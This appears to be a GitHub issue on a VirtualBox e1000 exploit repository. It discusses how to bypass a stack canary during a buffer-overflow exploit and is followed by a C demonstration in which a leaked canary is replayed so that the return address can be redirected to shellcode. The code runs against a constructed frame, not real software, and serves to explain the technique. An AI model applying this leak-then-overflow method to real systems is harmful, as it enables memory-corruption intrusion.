MorteNoir1/virtualbox_e1000_0day

about stackoverflow

jeongzero8732 opened this issue · 1 comment

Hi, I am a student in Korea.

I am currently conducting a 1-day case study based on the data. Currently, I have leaked and checked that the stack BOF is triggered, but the canary is the problem. How can I bypass it?

There is an article which uses the same vulnerability. Leveraging the out-of-bounds write to modify the buffer pointer fields in HDA, the author can get arbitrary read/write primitives. With the primitives, you can leak the canary content. But the author merely modifies a function pointer to a shellcode put in an RWX memory page and triggers it later.
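The leak-then-overflow idea from the comment above, as an added illustration that is not code from this repository or from the article it mentions: a constructed model of a stack frame with a canary sitting between the overflowable buffer and the saved return address, a stand-in `arb_read64` for whatever arbitrary-read primitive is available, and two attempts at the overflow. The frame layout, the canary value, and the addresses `LEGIT_RET` and `TARGET_ADDR` are assumptions made for the demonstration. The blind attempt trips the check; reading the canary first and replaying it in the payload does not. Since a process-wide canary (glibc keeps one value per process) only has to be leaked once, the read can come from any frame or from TLS, not necessarily from the frame being smashed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed model of a stack frame: overflowable buffer, then the canary,
 * then the saved frame pointer and return address. Not VirtualBox/HDA code. */
typedef struct {
    uint8_t  buf[32];
    uint64_t canary;
    uint64_t saved_fp;
    uint64_t ret_addr;
} frame_t;

/* Assumed process-wide canary; low byte zero, as glibc does, so a plain
 * string overflow that runs past the buffer cannot leave it intact. */
static const uint64_t CANARY_VALUE = 0x1d3a9c7e5b2f0800ULL;
#define LEGIT_RET   0x00007f1234560000ULL   /* assumed normal return site */
#define TARGET_ADDR 0x00007f12345a0000ULL   /* assumed RWX page with shellcode */

/* Stand-in for an arbitrary-read primitive: reads 8 bytes at any address. */
static uint64_t arb_read64(const void *addr) {
    uint64_t v;
    memcpy(&v, addr, sizeof v);
    return v;
}

/* Vulnerable routine: copies an attacker-controlled length starting at buf
 * with no bounds check, then runs the canary check that would precede ret.
 * Returns the address control would transfer to, or 0 if the check fails
 * (the __stack_chk_fail path). */
static uint64_t vulnerable_copy(frame_t *f, const uint8_t *data, size_t len) {
    f->canary   = CANARY_VALUE;
    f->saved_fp = 0;
    f->ret_addr = LEGIT_RET;
    uint8_t *dst = (uint8_t *)f;          /* offset 0 == f->buf */
    for (size_t i = 0; i < len && i < sizeof *f; i++)
        dst[i] = data[i];                 /* len > 32 overruns into canary, fp, ret */
    if (f->canary != CANARY_VALUE)
        return 0;
    return f->ret_addr;
}

/* Lay out the overflow: 32 filler bytes, canary, saved fp, return address. */
static size_t build_payload(uint8_t *out, uint64_t canary, uint64_t ret) {
    size_t off = 0;
    uint64_t fp = 0x4141414141414141ULL;  /* saved fp is don't-care here */
    memset(out, 'A', 32);                 off += 32;
    memcpy(out + off, &canary, 8);        off += 8;
    memcpy(out + off, &fp, 8);            off += 8;
    memcpy(out + off, &ret, 8);           off += 8;
    return off;
}

/* Blind overflow with a guessed canary: the check trips, returns 0. */
uint64_t exploit_without_leak(void) {
    frame_t f;
    uint8_t payload[sizeof(frame_t)];
    size_t n = build_payload(payload, 0x4141414141414141ULL, TARGET_ADDR);
    return vulnerable_copy(&f, payload, n);
}

/* Leak the canary with the read primitive, then replay it in the overflow:
 * the check passes and control goes to TARGET_ADDR. */
uint64_t exploit_with_leak(void) {
    frame_t f;
    uint8_t payload[sizeof(frame_t)];
    vulnerable_copy(&f, (const uint8_t *)"", 0);   /* benign call populates the frame */
    uint64_t leaked = arb_read64(&f.canary);
    size_t n = build_payload(payload, leaked, TARGET_ADDR);
    return vulnerable_copy(&f, payload, n);
}

int main(void) {
    printf("blind overflow   -> 0x%016llx\n", (unsigned long long)exploit_without_leak());
    printf("leak then overflow -> 0x%016llx\n", (unsigned long long)exploit_with_leak());
    return 0;
}
```

The two calls differ only in the 8 bytes written over the canary slot, which is the whole point: once the read primitive exists, the canary stops being a bypass problem and becomes one more value to copy into the payload, and the remaining work is the return-address target (here a fixed RWX page, as in the article the comment describes).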